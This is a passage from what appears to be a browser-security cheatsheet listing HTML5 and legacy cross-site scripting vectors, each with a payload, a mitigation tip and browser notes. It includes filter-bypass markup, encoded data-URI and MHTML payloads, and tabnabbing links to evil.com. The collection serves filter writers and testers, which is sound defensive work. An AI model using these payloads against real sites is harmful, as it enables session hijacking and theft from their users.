curity CheatsheetWhat your browser does when you look away...

Vectors making use of HTML5 features
XSS via formaction - requiring user interaction (1)#1 test
A vector displaying the HTML5 form and formaction capabilities for form hijacking outside the actual form.
<form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>
Don't allow users to submit markup containing "form" and "formaction" attributes or transform them to bogus attributes. Avoid "id" attributes for forms as well as submit buttons.
- xss
- html5
- opera
- chrome
- firefox
- formaction
- javascript
- button
- http://www.whatwg.org/specs/web-apps/current-work/multipage/association-of-controls-and-forms.html#attr-fs-formaction
.mario
Self-executing focus event via autofocus#7 test
This vector uses an input element with autofocus to call its own focus event handler - no user interaction required
<input onfocus=write(1) autofocus>
User submitted markup should not contain "autofocus" attributes.
- xss
- autofocus
- chrome
- opera
- http://www.w3.org/Bugs/Public/show_bug.cgi?id=9602
- http://www.whatwg.org/specs/web-apps/current-work/multipage/association-of-controls-and-forms.html#autofocusing-a-form-control
Gareth
Self-executing blur event via autofocus competition#8 test
Here we have two HTML input elements competing for the focus - and one executing JavaScript on losing its focus
<input onblur=write(1) autofocus><input autofocus>
User submitted markup should not contain "autofocus" attributes.
- xss
- autofocus
- blur
- chrome
- safari
- http://www.w3.org/Bugs/Public/show_bug.cgi?id=9602
- http://www.whatwg.org/specs/web-apps/current-work/multipage/association-of-controls-and-forms.html#autofocusing-a-form-control
.mario
JavaScript execution via <VIDEO> poster attribute#10 test
Opera 10.5+ allows using poster attributes in combination with javascript: URIs. This bug has been fixed in Opera 11.
<video poster=javascript:alert(1)//></video>
Make sure only relative URIs, http URIs and correctly MIME-typed data URIs can be used for VIDEO poster attributes
- xss
- poster
- video
- opera
- html5
.mario
Self-executing JavaScript via <BODY> onscroll autofocus#12 test
This vector triggers an onscroll event executing JavaScript on <BODY> due to an autofocus on an <INPUT> way further down the page.
<body onscroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
- xss
- autofocus
- scroll
- chrome
- opera
- http://www.w3.org/Bugs/Public/show_bug.cgi?id=9602
.mario
Form surveillance with onformchange, onforminput and form attributes#23 test
Enter a value into the form element to see how "onforminput" and "onformchange" attributes can monitor <FORM> activity - even from outside the <FORM> via the form attribute on a <BUTTON> element.
<form id=test onforminput=alert(1)><input></form><button form=test onformchange=alert(2)>X</button>
Make sure users cannot submit markup including the form, "onformchange" and "onforminput" attributes. Do not apply <FORM> elements with an "id" attribute.
- surveillance
- javascript
- opera
- html5
- onforminput
- onformchange
- http://www.whatwg.org/specs/web-apps/current-work/multipage/association-of-controls-and-forms.html#broadcast-formchange-events
Skyphire, .mario
JavaScript execution via <VIDEO> and <SOURCE> tag (1)#55 test
Opera 10.5+ and Chrome allow error handlers in <SOURCE> tags if encapsulated by a <VIDEO> tag. The same works for <AUDIO> tags
<video><source onerror="alert(1)">
Make sure user submitted <SOURCE> tags cannot contain event handlers or whitelist event handlers necessary for UI controls.
- xss
- javascript
- video
- source
- html5
- opera
- chrome
- audio
.mario
JavaScript execution via <VIDEO> and <SOURCE> tag (2)#56 test
Firefox 3.5+ allows error handlers in <VIDEO> tags when applied with a <SOURCE> tag. The same works for <AUDIO> tags. On Firefox 4+ the <SOURCE> tag is irrelevant to trigger the error event. This happens because of the implicit "src" attribute in <VIDEO> tag when the page has a number sign (#) in the URL.
<video onerror="alert(1)"><source></source></video>
Make sure user submitted <AUDIO> and <VIDEO> tags cannot contain event handlers or whitelist event handlers necessary for UI controls.
- xss
- javascript
- video
- source
- html5
- firefox
- audio
.mario
XSS via formaction - requiring user interaction (2)#72 test
A vector displaying the HTML5 "formaction" capabilities for form hijacking. Note that this variation does not use the "id" and "form" attributes to connect button and form.
<form><button formaction="javascript:alert(1)">X</button>
Don't allow users to submit markup containing "form" and "formaction" attributes or transform them to bogus attributes.
- xss
- html5
- opera
- formaction
- javascript
- button
- http://www.whatwg.org/specs/web-apps/current-work/multipage/association-of-controls-and-forms.html#attr-fs-formaction
.mario
Passive JavaScript execution via <BODY> and oninput attribute#86 test
All browsers besides Internet Explorer 9↓ support the "oninput" event handler around form elements like the given <INPUT>. The event works for the form elements itself, the surrounding form and <BODY> as well as <HTML> tags.
<body oninput=alert(1)><input autofocus>
Do not whitelist "oninput" attributes in user submitted markup.
- xss
- javascript
- html5
- oninput
- form
- passive
- event
Skyphire
Passive JavaScript execution via MathML on Firefox#130 test
Modern Firefox versions allow usage of inline MathML. While other user agents don't support the href attribute for MathML elements (yet), Firefox does and thereby enables passive JavaScript execution. Note that supporting href for MathML elements is a feature - introduced with MathML 3. The same effect can be observed by using xlink:href. The statusline action further enables obfuscation of the actual link target - and in this example hides the JavaScript URI.
<math href="javascript:alert(1)">CLICKME</math> <math>  <maction actiontype="statusline#http://google.com" xlink:href="javascript:alert(2)">CLICKME</maction>  <maction actiontype="statusline" xlink:href="javascript:alert(3)">CLICKME<mtext>http://http://google.com</mtext></maction> </math>
Do not allow users to submit unfiltered MathML content.
- mathml
- xss
- inline
- firefox
.mario, LeverOne
Transparent overwriting of request-data using HTML5 "dirname" attributes#136 test
Opera and Chrome support the HTML5 attribute "dirname", that can be used to have the browser communicate the text-flow direction of another input element by adding it to the server-sent request body. By injecting a "dirname" attribute in an existing form, an attacker can overwrite user input and thereby make it guessable for malicious purposes. The overwritten value would then be "ltr" or "rtl" - depending on the actual text-flow direction. The "dirname" attribute is not yet supported by Internet Explorer or Firefox.
<form action="" method="post"> <input name="username" value="admin" /> <input name="password" type="password" value="secret" /> <input name="injected" value="injected" dirname="password" /> <input type="submit"> </form>
Avoid white-listing the "dirname" attribute in user generated content. The effects on existing forms are hard to predict and might cause privacy problems and information leaks.
- html5
- dirname
- privacy
- http
- form
- infoleak
- http://dev.w3.org/html5/spec/common-input-element-attributes.html#the-dirname-attribute
- http://html5sec.org/dirname/
.mario
Executing JavaScript via cross-origin HTML imports#138 test
Google Chrome Canary already supports HTML Imports. They allow to fetch resources from arbitrary origins (as long as the Access-Control-Origin headers are set properly) and inject it into the requesting DOM. Currently, only Chrome supports the feature and it's still hidden behind a flag. It is however to be expected to be supported by all major browsers.
<link rel="import" href="test.svg" />
Make sure that HTML imports are limited to the same origin. Avoid permitting users to have <link> tags in user-generated rich-text as they can now directly execute JavaScript without any user interaction.
- html5
- imports
- link
- rel
- xss
- active
- http://www.w3.org/TR/html-imports/
- http://html5sec.org/cspbypass/
.mario
Executing JavaScript via "srcdoc" attribute in Iframes#139 test
HTML5 specifies a "srcdoc" attribute for Iframes. This attribute, quite similar to data URIs, is capable of hosting HTML text to be rendered by the browser as the content of the Iframe. The pseudo-document created by the "srcdoc" attribute has full access to the hosting domain, although it runs in an artificial origin. This attribute should if at all only be used in combination with the Iframe Sandbox.
<iframe srcdoc="<img src=x:x onerror=alert(1)>" />
Make sure to use "srcdoc" only in combination with the Iframe Sandbox. Otherwise, XSS attacks might slip through existing filters' rules as the payload can be HTML encoded.
- html5
- iframe
- sandbox
- srcdoc
- xss
- active
- entities
- http://www.whatwg.org/specs/web-apps/current-work/multipage/the-iframe-element.html#attr-iframe-srcdoc
- https://developer.mozilla.org/en-US/docs/Web/HTML/Element/iframe
.mario
HTML5 <picture> element and "srcset" attributes#142 test
HTML5 offers the <picture> element for responsive and accessible images. The <picture> element essentially wraps <source> and <img> elements and provides a way to offer alternative content. Novel here is that the "srcset" attribute allows to trigger load events. This is likely to bypass existing WAF systems.
<picture><source srcset="x"><img onerror="alert(1)"></picture> <picture><img srcset="x" onerror="alert(1)"></picture> <img srcset=",,,,,x" onerror="alert(1)">
In case a black-list based XSS filter is in use, make sure that the combination of event handler and "srcset" attribute is detected by it as well.
- picture
- srcset
- html5
- accessibility
- http://www.whatwg.org/specs/web-apps/current-work/multipage/embedded-content.html#the-picture-element
- http://responsiveimages.org/
.mario
Bypassing window.opener protection of rel="noreferrer"#143 test
In many situations, a developer might want to mitigate tab-nabbing attacks that are using window.opener and its writable location object. To do so, it is recommended to apply external links with a rel="noreferrer" attribute. Depending on how the external links are embedded, the protection might however fail - and window.opener might not be null but still be exposed. The problem here is, that rel attributes only work for <a> and <area>. Links and link-like navigation features can however be embedded in multiple other ways. Further note, that MSIE pretty much ignores the standard and doesn't destroy window.opener without further effort.
<a href="//evil.com" target="_blank" rel="noreferrer">CLICK</a> // window.opener will be null <map><area href="//evil.com" target="_blank" rel="noreferrer">CLICK</area></map> // window.opener will be null <svg><a xlink:href="//evil.com" rel="noreferrer">CLICK</a></svg> // window.opener still works <form action="//evil.com" target="_blank" rel="noreferrer"><input type="submit"></form>// window.opener still works <form id="test" rel="noreferrer"></form><button form="test" formtarget="_blank" formaction="//evil.com">CLICKME</button>// window.opener still works <math href="//evil.com" xlink:show="new" rel="noreferrer">CLICKME</math>// window.opener still works
Do not rely on the noreferrer attribute value alone, but rather use a dedicated de-referrer page that in additon deactivates window.opener using window.opener.__proto__=null.
- referrer
- opener
- html5
- location
- tabnabbing
.mario
Generating greater-than with HTML5 Named Character References#144 test
Some of the HTML5 Named Character references generate two ASCII characters, such as &nvlt; and &nvgt;. This can in some exotic scenarios be abused to generate valid HTML without actually closing a tag with an ASCII greater-than. The entity will produce the greater-than so we do not have to.
<iframe srcdoc="<svg onload=alert(1)&nvgt;"></iframe> <a href="javascript:'<svg onload=alert(1)&nvgt;'">CLICK</a>
Be very careful when HTML attributes are used to carry HTML data that is later being used on the website. When entities are accepted, some HTML entities can produce dangerous characters even if they don't look like it on first sight.
- entity
- character reference
- html5
- iframe
- https://developers.whatwg.org/named-character-references.html#named-character-references
.mario
XSS without User Interaction from passive Elements#145 test
Often, an attacker can only inject into a "passive" element, meaning for instance a DIV or a SPAN. For those elements, it's not always trivial to execute injected JavaScript without user interaction (such as clicks or mouse events). If the element injected into is outside the visible range, it becomes hard to prove that the injection is in fact exploitable. For this reason, this item lists all currently known ways of executing JavaScript without user interaction from passive elements. The list is expected to grow over time. Note, that for some of the attacks here, the string "#xss" needs to be appended to the URL of the injected page.
#Chrome, Opera, Safari and Edge <div onfocus="alert(1)" contenteditable tabindex="0" id="xss"></div> <div style="-webkit-user-modify:read-write" onfocus="alert(1)" id="xss"> <div style="-webkit-user-modify:read-write-plaintext-only" onfocus="alert(1)" id="xss"> # Firefox <div onbeforescriptexecute="alert(1)"></div> <script>1</script> #MSIE10/11 & Edge <div style="-ms-scroll-limit:1px;overflow:scroll;width:1px" onscroll="alert(1)"> #MSIE10 <div contenteditable onresize="alert(1)"></div> # MSIE11 <div onactivate="alert(1)" id="xss" style="overflow:scroll"></div> <div onfocus="alert(1)" id="xss" style="display:table"> <div id="xss" style="-ms-block-progression:bt" onfocus="alert(1)"> <div id="xss" style="-ms-layout-flow:vertical-ideographic" onfocus="alert(1)"> <div id="xss" style="float:left" onfocus="alert(1)"> # Chrome, Opera, Safari <style>@keyframes x{}</style> <div style="animation-name:x" onanimationstart="alert(1)"></div> # Chrome, Opera, Safari <style> div {width: 100px;} div:target {width: 200px;} </style> <div id="xss" onwebkittransitionend="alert(1)" style="-webkit-transition: width .1s;"></div> # Safari <div style="overflow:-webkit-marquee" onscroll="alert(1)"></div>
Most modern browsers provide ways to execute JavaScript from passive elements by combining several aspects an attacker can control. Seemingly passive XSS should thus be treated with similar severity than active XSS.
- user interaction
- passive elements
- html5
- css
- contenteditable
- https://jsfiddle.net/wmo6pr2v/
.mario, Ben Hayak, avlidienbrunn, Masato Kinugawa
JavaScript execution via <DETAILS> and ontoggle#147 test
The <DETAILS> element fires an "ontoggle" event without user interaction on modern Blink-based browsers. This can be abused to bypass blacklists as the event-tag combination is not very well known.
<details open ontoggle="alert(1)">
Be sure to work with whitelists when allowing users to submit markup - else experimental tags like <DETAILS> might be forgotten to filter and escape.
- details
- ontoggle
- html5
- user interaction
tsetnep, Psych0tr1a
JavaScript execution via <VIDEO> with empty source and rate change events#148 test
The <VIDEO> element fires an "onratechange" event without user interaction on Firefox, even if no actual value for the "src" attribute is given. This can be used to bypass WAF and IDS systems as this combination of tag and attributes is rather uncommon and unknown.
<video src onratechange="alert(1)">
Be sure to work with whitelists when allowing users to submit markup - else tags like <VIDEO> might be forgotten to filter and escape.
- video
- onratechange
- html5
- user interaction
- src
Qab

Vectors working on HTML4 and older versions
JavaScript execution via <FRAMESET> and onload#31 test
This classic vector shows that several tags don't need a "src" attribute to fire onload events, such as <IFRAME>, <BODY> and <FRAMESET>.
<frameset onload=alert(1)>
Be sure to work with whitelists when allowing users to submit markup - else ancient tags like <FRAMESET> might be forgotten to filter and escape.
- xss
- javascript
- frames
- classic
- html
- onload
.mario
JavaScript execution via <TABLE> and background#32 test
Opera 8-10.5+ as well as Internet Explorer 6 support JavaScript URIs for <TABLE> and some other tags' "background" attributes. This causes JavaScript execution without user interaction. The problem has been fixed in Opera 11.
<table background="javascript:alert(1)"></table>
In case evil attributes like event handlers are being filtered from user submitted markup make sure not to forget "background" - among others.
- xss
- javascript
- background
- classic
- html
- table
.mario
HTML comment parsing issues (1)#37 test
This vector shows how comments are being parsed and what problems can arise in case user submitted HTML is allowed to contain comments.
<img src=x onerror=alert(1)//">
Make sure comments are not allowed in user submitted html. The markup should be checked for security issues after comments have been stripped out - not before.
- xss
- javascript
- comment
- parsing
- attributes
sirdarckcat, .mario
HTML comment parsing issues (2)#38 test
Besides  <![><img src="]><img src=x onerror=alert(1)//">  <svg><![CDATA[><image xlink:href="]]><img src=xx:x onerror=alert(2)//"></svg>
Make sure CDATA delimiters are not allowed in user submitted html. The markup should be checked for security issues after CDATA sections nd delimiters have been stripped out or escaped - not before.
- xss
- javascript
- cdata
- parsing
- attributes
- math
- svg
- inline
LeverOne
Plaintext tags used for markup obfuscation#40 test
This vector works on all tested user agents and shows how several filtering solutions can be tricked into accepting malicious HTML. A badly written filter will assume the error handler is part of the first image's "src" attribute and accept the incoming data.
<style><img src="</style><img src=x onerror=alert(1)//">
Don't rely on weak regular express for markup filtering. Use whitelists for allowed tags and rely on a filter solution based on a heavily tested tokenizer/parser.
- xss
- javascript
- plaintext
- tags
- parsing
- attributes
LeverOne
Error handler via empty list-style and load handler via empty content#41 test
Opera 10.5+ and earlier versions fire an error event for <LI> tags in case the background URL via style attribute cannot be loaded. The same works with "list-style-image" too. On Opera 10.10 and earlier more tag/style combinations like background:url() and background-image:url() work as well. Also works combination like content:url(svg), but at the moment it is sensitive to events and <script> tags before and after.
<li style=list-style:url() onerror=alert(1)></li> <div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)></div>
- xss
- javascript
- css
- background
- opera
- onerror
- content
LeverOne, .mario
Link hijacking via <BASE> and JavaScript URI#42 test
<BASE> link hijacking with JavaScript URIs works on Internet Explorer, Opera (O8-10.5 in case the link URL starts with #) and Safari. User interaction is required to execute the JavaScript. The vector sometimes has to be changed slightly to work for all mentioned user agents. Opera 11 ships a more or less working fix, but this problem continues to exist in difficult to exploit forms though.
<head><base href="javascript://"/></head><body><a href="/. /,alert(1)//#">XXX</a></body>
User submitted HTML should not allow usage of <BASE> tags. In case they are necessary no non-HTTP/non-relative URL schemes should be allowed.
- xss
- javascript
- opera
- internet explorer
- base
- hijacking
brainpillow, Gareth, .mario
JavaScript execution via <SCRIPT> for and event attributes#48 test
Internet Explorer allow using <SCRIPT> tags with "for" and "event" attributes to bind event data to specific html elements. The two shown attribute values cause script execution without user interaction. Opera simply ignores these attributes.
<SCRIPT FOR=document EVENT=onreadystatechange>alert(1)</SCRIPT>
- xss
- javascript
- opera
- for
- event
- internet explorer
.mario
JavaScript execution via <OBJECT> DataURL attribute#49 test
Internet Explorer 9 and - in some situations - earlier versions support the use of JavaScript URIs for the "dataurl" attribute of a TDC Object. The JavaScript will be executed without user any interaction.
<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT>
- xss
- javascript
- internet explorer
- object
- dataurl
- TDC
- http://msdn.microsoft.com/en-us/library/ms531356%28v=VS.85%29.aspx#Understanding_the_TDC_Object_Model
.mario
JavaScript execution via <OBJECT> data#50 test
Almost all browsers supporting data URIs allow executing JavaScript via crafted <OBJECT> "data" attribute value - even if base64 encoded. Note however, that different browsers execute the JavaScript on different origins. Firefox for instance will execute on the hosting domain and thus allow XSS, while Chrome will execute on about:blank.
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
Make sure user submitted HTML cannot contain <OBJECT> tags or only whitelisted <OBJECT> "data" values.
- xss
- javascript
- opera
- chrome
- embed
- safari
- src
- firefox
- base64
.mario
JavaScript execution via <EMBED> src#51 test
Almost all browsers supporting data URIs allow executing JavaScript via crafted <EMBED> "src" attribute value - even if base64 dencoded. Only Firefox attempts to search for a plugin handler and fails.
<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></embed> <embed src="javascript:alert(1)"></embed> // Firefox only
Make sure user submitted HTML cannot contain <EMBED> tags or only whitelisted <EMBED> "src" values.
- xss
- javascript
- opera
- chrome
- embed
- safari
- src
- base64
.mario
Tags nested in other tags to trick filters#57 test
Chrome, Firefox and Safari will execute JavaScript with this example nesting - while Opera and IE wouldn't.
<b <script>alert(1)//</script>0</script></b>
This vector is ideal to trick regular expression based HTML filters and sanitizers. Make sure your filters are aware of the fact that some user agents evaluate <b <script> while others will prefer <b><script>.
- xss
- javascript
- nesting
- script
- parser
- regex
.mario, Kyo, sirdarckcat
XSS using accent grave when copying innerHTML (1)#59 test
Internet Explorer treats the accent grave (`) as an attribute delimiter like " and '. The quotation mark (") will be stripped from the attribute value when using the innerHTML property in case it doesn't contain space.
<div id="div1"><input value="``onmouseover=alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>
Make sure the HTML filter you use is aware of the fact that the accent grave is a valid attribute delimiter for IE too - especially if users are allowed to post harmless JavaScript (JSReg, Google Caja). Be very careful when handling user generated HTMl in the DOM later on. The innerHTML property does not always contain what it's supposed to.
- xss
- javascript
- internet explorer
- script
- dom
- innerhtml
- #97
- #98
- #128
hasegawayosuke
Simulating attributes in IE#62 test
This vector simulates an attribute in IE by using a single quote to trick filters. This works up to IE9 in standards mode and in latest IE using older document modes.
 <x '="foo"><x foo='><img src=x onerror=alert(1)//'>  <! '="foo"><x foo='><img src=x onerror=alert(2)//'> <? '="foo"><x foo='><img src=x onerror=alert(3)//'>
- xss
- javascript
- attribute
- simulating
- parser
- regex
Algol, jackmasa, LeverOne, White Jordan
JavaScript execution via src attribute#63 test
Most browsers allow executing JavaScript via <IFRAME> "src" attributes - this is expected behavior. Interesting is though that this can be extended to other tags too. Opera 10, Chrome and Firefox execute JavaScript by using the <EMBED> tag while Opera 10 and Opera Mobile even execute JavaScript with <SCRIPT>, <IMG> and <IMAGE> and a matching "src" attribute as well as early Internet Explorer versions.
<embed src="javascript:alert(1)"></embed> // O10.10↓, OM10.0↓, GC6↓, FF <img src="javascript:alert(2)"> <image src="javascript:alert(2)"> // IE6, O10.10↓, OM10.0↓ <script src="javascript:alert(3)"></script> // IE6, O11.01↓, OM10.1↓
Make sure "src" attributes can never contain non-HTTP-URLs to prevent XSS or worse.
- xss
- javascript
- src
- safari
- chrome
- opera
- firefox
- internet explorer
.mario
JavaScript execution via IE filters and onfilterchange#70 test
In some situations it's possible to trigger a filterchange event by using just one filter as the example shows. Also the short filter notation is being used which is supported by all IE versions despite the information in the documentation. In compatibility mode to IE8+ you can use the property "-ms-filter".
<div style=width:1px;filter:glow onfilterchange=alert(1)>x</div>
- xss
- javascript
- filter
- css
- style
- onfilterchange
- internet explorer
- http://msdn.microsoft.com/en-us/library/ms532847%28VS.85%29.aspx
- http://msdn.microsoft.com/en-us/library/ie/hh801215(v=vs.85).aspx
.mario
<OBJECT> tag and Flash files executing JavaScript#79 test
<OBJECT> tags directly including Flash files via the "data" attribute - allowing execution of JavaScript and more without user interaction.
<object allowscriptaccess="always" data="test.swf"></object>
Make sure users cannot control the "src" and "data" attribute values of <OBJECT> tags - or better don't whitelist <OBJECT> tags in user submitted markup at all.
class XSS {public static function main() { flash.Lib.getURL(new flash.net.URLRequest(flash.Lib._root.url||"javascript:alert(1)"),flash.Lib._root.name||"_top"); }}crossdomain: 1path: http://html5sec.org/test.swfname: test.swf
- xss
- javascript
- object
- flash
- swf
- safari
- firefox
- opera
- http://www.w3.org/TR/REC-html40/struct/objects.html
.mario
Special tags parsing issues#91 test
The HTML tagnames start with a-zA-Z (abstracting from ignoring null byte from IE). In addition, there are other structures, parsed as a tag (special tags). They begin with the following characters: !,?, /,%. This has its reasons: DTD, comments, xml-declaration, import-instruction in Internet Explorer, closing tags etc. starts by these characters. These examples show that such tags will inherit some properties of their standard models. [A] Firefox, Opera, Google Chrome, Safari (4.0.4↑), IE 10↑ Standards mode: Parameters of the special tags can not contain a closing parenthesis ">". [B] Safari (up to 4.0.3): Parameter of the special tags can be broken only via "?>". [C] Opera (up to 11.52): Special tag inherits the properties of DTD: inside it you can create a section that starts with "[" and ends with "]". [D] IE 9↓ Standards mode, Safari (up to 4.0.3): A sequence like "<% ... %>" is an alternative to comments. These features can be used for obfuscation and bypassing filters. And remember, do not parse as a tag in HTML structure like "<È foo=...>".
[A] <? foo="><script>alert(1)</script>"> <! foo="><script>alert(1)</script>"> </ foo="><script>alert(1)</script>"> [B] <? foo="><x foo='?><script>alert(1)</script>'>"> [C] <! foo="[[[x]]"><x foo="]foo><script>alert(1)</script>"> [D] <% foo><x foo="%><script>alert(1)</script>">
- xss
- tagname
- internet explorer
- opera
- firefox
- chrome
- safari
- parsing
- breaking
- obfuscation
- closing tag
- http://sla.ckers.org/forum/read.php?2,15812,28148#msg-28148
- #134
LeverOne, wpulog
JavaScript execution via MHTML-scheme#96 test
This example used the ability to convert the file with any conent type into a web archive using mhtml URI scheme to run JavaScript. For the first time this feature was discovered by Stepanishchev E. in 2006 and became known among web developers as an alternative to data URI for IE6-7. In 2007, Hasegawa Y. independently proposed a way to use this mhtml feature for XSS. Followed fix was incomplete because it doesn't take into account the possibility of addressing to the contents of the archive using "!value". This possibility as well as the possibility to access from the archive contents to a host domain are used in the example below. Using this vector all sites that do not contain two new lines in the source code and allows users to insert new line were vulnerable - as well as all sites that allow users to upload images without post-upload conversion etc. A link to this web archives could be specified via <IFRAME> or location.href and comparable. This example was published in June 2010, fix released in April 2011. The mhtml URI scheme doesn't determine the content type now, but archive contents still has access to the host domain.
<iframe src=mhtml:http://html5sec.org/test.html!xss.html></iframe> <iframe src=mhtml:http://html5sec.org/test.gif!xss.html></iframe>
<html> <body> <b>some content without two new line \n\n</b> Content-Type: multipart/related; boundary="******"<b>some content without two new line</b> --****** Content-Location: xss.html Content-Transfer-Encoding: base64 PGlmcmFtZSBuYW1lPWxvIHN0eWxlPWRpc3BsYXk6bm9uZT48L2lmcmFtZT4NCjxzY3JpcHQ+DQp1 cmw9bG9jYXRpb24uaHJlZjtkb2N1bWVudC5nZXRFbGVtZW50c0J5TmFtZSgnbG8nKVswXS5zcmM9 dXJsLnN1YnN0cmluZyg2LHVybC5pbmRleE9mKCcvJywxNSkpO3NldFRpbWVvdXQoImFsZXJ0KGZy YW1lc1snbG8nXS5kb2N1bWVudC5jb29raWUpIiwyMDAwKTsNCjwvc2NyaXB0PiAgICAg --******-- </body> </html>crossdomain: 1path: http://html5sec.org/test.htmlname: test.html
- xss
- internet explorer
- archive
- mhtml
Bolk, LeverOne
XSS using "xmlns" attribute in custom tag when copying innerHTML (2)#97 test
Internet Explorer incorrectly analyzes the attribute "xmlns" in custom tags when copying innerHTML - its value is being added to the tag <?XML:NAMESPACE> without any delimiters.
 <div id=d><x xmlns="><iframe onload=alert(1)"></div> <script>d.innerHTML+='';</script>  <div id=d><x xmlns='"><iframe onload=alert(2)//'></div> <script>d.innerHTML+='';</script>
Be very careful when handling user generated HTMl in the DOM later on. The innerHTML property does not always contain what it's supposed to.
- xss
- javascript
- internet explorer
- script
- dom
- innerhtml
- #59
- #98
- #128
LeverOne
HTML separators and ignored characters#100 test
[a] Characters accepted as tag name/attribute separators. Firefox, Internet Explorer, Safari, Google Chrome, Opera : 9,10,12,13,32,47 Internet Explorer (5-9 SM): 11 [b] Characters ignored before attributes (and not accepted as parameter/attribute separators). Firefox, Internet Explorer, Safari, Google Chrome, Opera : 47 Internet Explorer (5-9 SM): 0** [c] Characters ignored between attribute name and equals sign. Firefox, Internet Explorer, Safari, Google Chrome, Opera : 9,10,12,13,32 Internet Explorer (5-9 SM): 0,11 [d] Characters accepted as parameter/attribute separators. Firefox, Internet Explorer, Safari, Google Chrome, Opera : 9,10,12,13,32 Internet Explorer (5-9 SM): 11 [e] Characters ignored between equals sign and parameter. Firefox, Internet Explorer, Safari, Google Chrome, Opera : 9,10,12,13,32 Internet Explorer (5-9 SM): 0,11 * Characters are given as decimal ASCII table index. ** There is a common rule that the unencoded null character does not exist for IE HTML parser.
<img[a][b]src=x[d]onerror[c]=[e]"alert(1)">
- xss
- internet explorer
- firefox
- opera
- chrome
- safari
- separator
hasegawayosuke, .mario, RSnake,
Characters ignored in the URI scheme#101 test
The following characters* are ignored in the URI sheme: [a] All mentioned browsers: 9,10,13,32 IE, GC, Safari, Opera: 11,12 IE, GC, Safari, FF 3.6.28↓: 8 IE, GC, Safari: 1-7,14-31 Opera: 160,5760,6158,8192-8202,8232,8233,8239,8287,12288 Opera 11.52↓: 6159 IE (5-9 SM): 0 [b],[c] IE, GC, Safari 4.0.3↓, FF 4-6, Opera 10.63↓: 9,10,13 GC 7↓, Safari 4.0.3↓: 1-8,11,12 IE (5-9 SM): 0 Safari 4.0.4↑, Opera 11↑, FF 7↑: nothing * Characters are given as decimal ASCII table index.
<a href="[a]java[b]script[c]:alert(1)">XXX</a>
- xss
- javascript
- internet explorer
- script
- chrome
- safari
- http://shazzer.co.uk/vectors?search=protocol
Gareth, .mario, RSnake
Forced plaintext via unbalanced quotes in Internet Explorer#102 test
Internet Explorer treats any tag as plaintext in case the attribute delimiters are unbalanced - in this example caused by the ` `. In unbalanced quotes appear inside or outside an attributes - preceded by an arbitrary character but the equals sign - the usage of HTML inside attributes is possible and the content will be rendered as regular HTML. The problem has been reported and will be taken care of in later versions of the Internet Explorer.
<img src="x` `<script>alert(1)</script>"` `>
- xss
- javascript
- internet explorer
- parser
- backtick
- plaintext
- #62
- #108
- #133
.mario, hasegawayosuke
Safari attribute ofuscation with slashes and quotes#106 test
Safari accepts slashes and quotes (if preceded by whitespace, slashes or other quotes) between attribute names and the equals character (name/"'=value). This enables interesting possibilities to obfuscate HTML strings, bypass filters and mimick attributes like in the given example.
<img src onerror /" '"= alt=alert(1)//">
- xss
- javascript
- safari
- attributes
- delimiter
- parser
Superhei, .mario
JavaScript execution via <TITLE> tag on Inernet Explorer 9#107 test
Internet Explorer 9 allows execution of JavaScript via onpropertychange event handler on <title> tags if another <title> tag follows up - having at least one valid attribute. This vector works in IE6-8 Standards mode and in IE9 quirks mode.
<title onpropertychange=alert(1)></title><title title=></title>
- xss
- javascript
- title
- onpropertychange
- internet explorer
.mario
Internet Explorer parameter parsing issue#108 test
Internet Explorer treats the sequence of any quotes that follows the equal sign in a parameter without delimiters as the beginning of some semblance of new parameter.
 <a href=http://foo.bar/#x=`y></a><img alt="`><img src=xx:x onerror=alert(1)></a>">  <!a foo=x=`y><img alt="`><img src=xx:x onerror=alert(2)//"> <?a foo=x=`y><img alt="`><img src=xx:x onerror=alert(3)//">
- xss
- javascript
- parameter
- parsing
- internet explorer
- #62
- #102
Algol, jackmasa, sirdarckcat
Internet Explorer conditional comments - XSS via [if]> and <img> injection#115 test
Conditional comments on Internet Explorer can cause trouble as soon as an attacker is able to inject rectangular brackets wrapping the words if and endif with almost arbitrary suffixes. A condition always being true will lead to immediate parsing of the enclosed markup on all tested Internet Explorer versions. The second example injects an <img> tag into the comment condition leading to immediate JavaScript execution as well. The examples are worked up to IE 9 standards mode.
 
Make sure an attacker cannot turn a comment injection into a conditional comment by using rectangular brackets such as shown in the example. Comment content should be escaped like regular markup - the delimiting sequence --> is neither sufficient nor necessary to successfully close a comment.
- xss
- conditional
- comments
- internet explorer
- rectangular
.mario
Backslashes as alternative to slashes on Webkit#124 test
Safari treats backslashes the same way as slash inside URL attributes. Chrome treats prefix "/\" of URL the same way as "//".
<script src="/\example.com\foo.js"></script> // Safari 5.0, Chrome 9, 10 <script src="\\example.com\foo.js"></script> // Safari 5.0
- html
- dom
hasegawayosuke
QuickTime events causing JavaScript execution#126 test
The below displayed construct enables usage of the more or less unknown QuickTime DOM events. Those contain an underscore - which is rather uncommon for event handlers and thus bypasses many blacklist based filters. The attack only works if both <object> tags are in place - and <object> tag 1 supplys the necessary behavior for object tag two.
<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object>
- quicktime
- html
- event
- object
- classid
- xss
- http://developer.apple.com/library/mac/#documentation/QuickTime/Conceptual/QTScripting_JavaScript/bQTScripting_JavaScri_Document/QuickTimeandJavaScri.html#//apple_ref/doc/uid/TP40001526-CH001-SW6
.mario
Ending HTML comments with a backtick character#133 test
On older versions of the Internet Explorer, a backtick charcater can be utilized to end a HTML comment and inject otherwise commented markup. A HTML filter allowing comments can be bypassed with this trick and allow an attacker to inject arbitrary HTML.
" by far not the only way to end a HTML comment.
- xss
- comments
- internet explorer
- backtick
- #62
- #102
- #115
jackmasa
"<% %>" and "" inside plaintext tags#134 test
